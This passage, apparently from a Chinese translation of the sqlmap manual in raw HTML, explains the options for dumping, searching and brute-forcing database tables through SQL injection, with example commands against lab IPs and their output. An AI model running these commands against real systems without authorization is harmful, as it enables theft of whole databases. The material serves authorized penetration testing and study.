Roman';\">\u5982\u679c\u5f53\u524d\u7ba1\u7406\u5458\u6709\u6743\u9650\u8bfb\u53d6\u6570\u636e\u5e93\u5176\u4e2d\u7684\u4e00\u4e2a\u8868\u7684\u8bdd\uff0c\u90a3\u4e48\u5c31\u80fd\u83b7\u53d6\u6574\u4e2a\u8868\u7684\u6240\u6709\u5185\u5bb9\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u4f7f\u7528<span>-D,-T<\/span><span>\u53c2\u6570\u6307\u5b9a\u60f3\u8981\u83b7\u53d6\u54ea\u4e2a\u5e93\u7684\u54ea\u4e2a\u8868\uff0c\u4e0d\u4f7f\u7528<\/span><span>-D<\/span><span>\u53c2\u6570\u65f6\uff0c\u9ed8\u8ba4\u4f7f\u7528\u5f53\u524d\u5e93\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>Firebird<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/firebird\/get_int.php?id=1&#8221;&nbsp;&#8211;dump&nbsp;-T&nbsp;users<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Database:&nbsp;Firebird_masterdb<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Table:&nbsp;USERS<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[4&nbsp;entries]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;-+&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;ID&nbsp;|&nbsp;NAME&nbsp;&nbsp;&nbsp;|&nbsp;SURNAME&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;-+&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;+<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;1&nbsp;&nbsp;|&nbsp;luther&nbsp;|&nbsp;blisset&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;2&nbsp;&nbsp;|&nbsp;fluffy&nbsp;|&nbsp;bunny&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;3&nbsp;&nbsp;|&nbsp;wu&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;ming&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">|&nbsp;4&nbsp;&nbsp;|&nbsp;NULL&nbsp;&nbsp;&nbsp;|&nbsp;nameisnull&nbsp;|<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">+&#8212;-+&#8212;&#8212;&#8211;+&#8212;&#8212;&#8212;&#8212;+<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u53ef\u4ee5\u83b7\u53d6\u6307\u5b9a\u5e93\u4e2d\u7684\u6240\u6709\u8868\u7684\u5185\u5bb9\uff0c\u53ea\u7528<span>--dump<\/span><span>\u8ddf<\/span><span>-D<\/span><span>\u53c2\u6570\uff08\u4e0d\u4f7f\u7528<\/span><span>-T<\/span><span>\u4e0e<\/span><span>-C<\/span><span>\u53c2\u6570\uff09\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e5f\u53ef\u4ee5\u7528<span>--dump<\/span><span>\u8ddf<\/span><span>-C<\/span><span>\u83b7\u53d6\u6307\u5b9a\u7684\u5b57\u6bb5\u5185\u5bb9\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u4e3a\u6bcf\u4e2a\u8868\u751f\u6210\u4e86\u4e00\u4e2a<\/span><span>CSV<\/span><span>\u6587\u4ef6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u4f60\u53ea\u60f3\u83b7\u53d6\u4e00\u6bb5\u6570\u636e\uff0c\u53ef\u4ee5\u4f7f\u7528<span>--start<\/span><span>\u548c<\/span><span>--stop<\/span><span>\u53c2\u6570\uff0c\u4f8b\u5982\uff0c\u4f60\u53ea\u60f3\u83b7\u53d6\u7b2c\u4e00\u6bb5\u6570\u636e\u53ef<\/span><span>\u4ee5<\/span><span>\u4f7f\u7528<\/span><span>--stop&nbsp;1<\/span><span>\uff0c\u5982\u679c\u60f3\u83b7\u53d6\u7b2c\u4e8c\u6bb5\u4e0e\u7b2c\u4e09\u6bb5\u6570\u636e\uff0c\u4f7f\u7528\u53c2\u6570&nbsp;<\/span><span>--start&nbsp;1&nbsp;--stop&nbsp;3<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u4e5f\u53ef\u4ee5\u7528<span>--first<\/span><span>\u4e0e<\/span><span>--last<\/span><span>\u53c2\u6570\uff0c\u83b7\u53d6\u7b2c\u51e0\u4e2a\u5b57\u7b26\u5230\u7b2c\u51e0\u4e2a\u5b57\u7b26\u7684\u5185\u5bb9\uff0c\u5982\u679c\u4f60\u60f3\u83b7\u53d6\u5b57\u6bb5\u4e2d\u7b2c\u4e09\u4e2a\u5b57\u7b26\u5230\u7b2c\u4e94\u4e2a\u5b57\u7b26\u7684\u5185\u5bb9\uff0c\u4f7f\u7528<\/span><span>--first&nbsp;3&nbsp;--last&nbsp;5<\/span><span>\uff0c\u53ea\u5728\u76f2\u6ce8\u7684\u65f6\u5019\u4f7f\u7528\uff0c\u56e0\u4e3a\u5176\u4ed6\u65b9\u5f0f\u53ef\u4ee5\u51c6\u786e\u7684\u83b7\u53d6\u6ce8\u5165\u5185\u5bb9\uff0c\u4e0d\u9700\u8981\u4e00\u4e2a\u5b57\u7b26\u4e00\u4e2a\u5b57\u7b26\u7684\u731c\u89e3\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E7%9A%84%E5%86%85%E5%AE%B9\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--dump-all,--exclude-sysdbs<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u4f7f\u7528<span>--dump-all<\/span><span>\u53c2\u6570\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9\uff0c\u53ef\u540c\u65f6\u52a0\u4e0a<\/span><span>--exclude-sysdbs<\/span><span>\u53ea\u83b7\u53d6\u7528\u6237\u6570\u636e\u5e93\u7684\u8868\uff0c\u9700\u8981\u6ce8\u610f\u5728&nbsp;<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u4e2d<\/span><span>master<\/span><span>\u6570\u636e\u5e93\u6ca1\u6709\u8003\u8651\u6210\u4e3a\u4e00\u4e2a\u7cfb\u7edf\u6570\u636e\u5e93\uff0c\u56e0\u4e3a\u6709\u7684\u7ba1\u7406\u5458\u4f1a\u628a\u5b83\u5f53\u4f5c\u7528\u6237\u6570\u636e\u5e93\u6765\u4f7f\u7528\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%90%9C%E7%B4%A2%E5%AD%97%E6%AE%B5%EF%BC%8C%E8%A1%A8%EF%BC%8C%E6%95%B0%E6%8D%AE%E5%BA%93\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u641c\u7d22\u5b57\u6bb5\uff0c\u8868\uff0c\u6570\u636e\u5e93<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--search,-C,-T,-D<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">--search<span>\u53ef\u4ee5\u7528\u6765\u5bfb\u627e\u7279\u5b9a\u7684\u6570\u636e\u5e93\u540d\uff0c\u6240\u6709\u6570\u636e\u5e93\u4e2d\u7684\u7279\u5b9a\u8868\u540d\uff0c\u6240\u6709\u6570\u636e\u5e93\u8868\u4e2d\u7684\u7279\u5b9a\u5b57\u6bb5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u53ef\u4ee5\u5728\u4ee5\u4e0b\u4e09\u79cd\u60c5\u51b5\u4e0b\u4f7f\u7528\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-C<span>\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u5217\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u8868\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u5217\u540d\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-T<span>\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u8868\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u8868\u540d<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">-D<span>\u540e\u8ddf\u7740\u7528\u9017\u53f7\u5206\u5272\u7684\u5e93\u540d\uff0c\u5c06\u4f1a\u5728\u6240\u6709\u6570\u636e\u5e93\u4e2d\u641c\u7d22\u6307\u5b9a\u7684\u5e93\u540d\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%BF%90%E8%A1%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E7%9A%84SQL%E8%AF%AD%E5%8F%A5\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8fd0\u884c\u81ea\u5b9a\u4e49\u7684SQL\u8bed\u53e5<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--sql-query,--sql-shell<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u4f1a\u81ea\u52a8\u68c0\u6d4b\u786e\u5b9a\u4f7f\u7528\u54ea\u79cd<\/span><span>SQL<\/span><span>\u6ce8\u5165\u6280\u672f\uff0c\u5982\u4f55\u63d2\u5165\u68c0\u7d22\u8bed\u53e5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5982\u679c\u662f<span>SELECT<\/span><span>\u67e5\u8be2\u8bed\u53e5\uff0c<\/span><span>sqlmap<\/span><span>\u5c06\u4f1a\u8f93\u51fa\u7ed3\u679c\u3002\u5982\u679c\u662f\u901a\u8fc7<\/span><span>SQL<\/span><span>\u6ce8\u5165\u6267\u884c\u5176\u4ed6\u8bed\u53e5\uff0c\u9700\u8981\u6d4b\u8bd5\u662f\u5426\u652f\u6301\u591a\u8bed\u53e5\u6267\u884c<\/span><span>SQL<\/span><span>\u8bed\u53e5\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2000<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mssql\/get_int.php?id=1&#8221;&nbsp;&#8211;sql-query&nbsp;&#8220;SELECT&nbsp;&#8216;foo'&#8221;&nbsp;-v&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">[hh:mm:14]&nbsp;[INFO]&nbsp;fetching&nbsp;SQL&nbsp;SELECT&nbsp;query&nbsp;output:&nbsp;&#8216;SELECT&nbsp;&#8216;foo&#8221;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:14]&nbsp;[INFO]&nbsp;retrieved:&nbsp;foo<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">SELECT&nbsp;&#8216;foo&#8217;:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;foo&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/mssql\/get_int.php?id=1&#8221;&nbsp;&#8211;sql-query&nbsp;&#8220;SELECT&nbsp;&#8216;foo&#8217;,&nbsp;&#8216;bar'&#8221;&nbsp;-v&nbsp;2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;fetching&nbsp;SQL&nbsp;SELECT&nbsp;query&nbsp;output:&nbsp;&#8216;SELECT&nbsp;&#8216;foo&#8217;,&nbsp;&#8216;bar&#8221;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;the&nbsp;SQL&nbsp;query&nbsp;provided&nbsp;has&nbsp;more&nbsp;than&nbsp;a&nbsp;field.&nbsp;sqlmap&nbsp;will&nbsp;now&nbsp;unpack&nbsp;it&nbsp;into&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">distinct&nbsp;queries&nbsp;to&nbsp;be&nbsp;able&nbsp;to&nbsp;retrieve&nbsp;the&nbsp;output&nbsp;even&nbsp;if&nbsp;we&nbsp;are&nbsp;going&nbsp;blind<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[DEBUG]&nbsp;query:&nbsp;SELECT&nbsp;ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111))&nbsp;AS&nbsp;VARCHAR(8000)),&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">(CHAR(32)))<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;retrieved:&nbsp;foo<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[DEBUG]&nbsp;performed&nbsp;27&nbsp;queries&nbsp;in&nbsp;0&nbsp;seconds<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[DEBUG]&nbsp;query:&nbsp;SELECT&nbsp;ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114))&nbsp;AS&nbsp;VARCHAR(8000)),&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">(CHAR(32)))<\/span><span class=\"16\" 
style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[INFO]&nbsp;retrieved:&nbsp;bar<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:50]&nbsp;[DEBUG]&nbsp;performed&nbsp;27&nbsp;queries&nbsp;in&nbsp;0&nbsp;seconds<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">SELECT&nbsp;&#8216;foo&#8217;,&nbsp;&#8216;bar&#8217;:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;foo,&nbsp;bar&#8217;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E7%88%86%E7%A0%B4\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u7206\u7834<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E8%A1%A8%E5%90%8D\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u66b4\u529b\u7834\u89e3\u8868\u540d<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;common-tables<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5f53\u4f7f\u7528<span>--tables<\/span><span>\u65e0\u6cd5\u83b7\u53d6\u5230\u6570\u636e\u5e93\u7684\u8868\u65f6\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u901a\u5e38\u662f\u5982\u4e0b\u60c5\u51b5\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">1<span>\u3001<\/span><span>MySQL<\/span><span>\u6570\u636e\u5e93\u7248\u672c\u5c0f\u4e8e<\/span><span>5.0<\/span><span>\uff0c\u6ca1\u6709<\/span><span>information_schema<\/span><span>\u8868\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">2<span>\u3001\u6570\u636e\u5e93\u662f<\/span><span>Microsoft&nbsp;Access<\/span><span>\uff0c\u7cfb\u7edf\u8868<\/span><span>MSysObjects<\/span><span>\u662f\u4e0d\u53ef\u8bfb\u7684\uff08\u9ed8\u8ba4\uff09\u3002<\/span><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">3<span>\u3001\u5f53\u524d\u7528\u6237\u6ca1\u6709\u6743\u9650\u8bfb\u53d6\u7cfb\u7edf\u4e2d\u4fdd\u5b58\u6570\u636e\u7ed3\u6784\u7684\u8868\u7684\u6743\u9650\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u66b4\u529b\u7834\u89e3\u7684\u8868\u5728<span>txt\/common-tables.txt<\/span><span>\u6587\u4ef6\u4e2d\uff0c\u4f60\u53ef\u4ee5\u81ea\u5df1\u6dfb\u52a0\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5217\u4e3e\u4e00\u4e2a<span>MySQL&nbsp;4.1<\/span><span>\u7684\u4f8b\u5b50\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.129\/mysql\/get_int_4.php?id=1&#8221;&nbsp;&#8211;common-tables&nbsp;-D&nbsp;testdb&nbsp;&#8211;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:39]&nbsp;[INFO]&nbsp;testing&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:39]&nbsp;[INFO]&nbsp;confirming&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;MySQL<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;fetching&nbsp;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;server&nbsp;operating&nbsp;system:&nbsp;Windows<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">web&nbsp;application&nbsp;technology:&nbsp;PHP&nbsp;5.3.1,&nbsp;Apache&nbsp;2.2.14<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS&nbsp;operating&nbsp;system:&nbsp;Windows<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">back-end&nbsp;DBMS:&nbsp;MySQL&nbsp;&lt;&nbsp;5.0.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">banner:&nbsp;&nbsp;&nbsp;&nbsp;&#8216;4.1.21-community-nt&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;checking&nbsp;table&nbsp;existence&nbsp;using&nbsp;items&nbsp;from&nbsp;&#8216;\/software\/sqlmap\/txt\/common-tables.txt&#8217;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:40]&nbsp;[INFO]&nbsp;adding&nbsp;words&nbsp;used&nbsp;on&nbsp;web&nbsp;page&nbsp;to&nbsp;the&nbsp;check&nbsp;list<\/span><span class=\"16\" 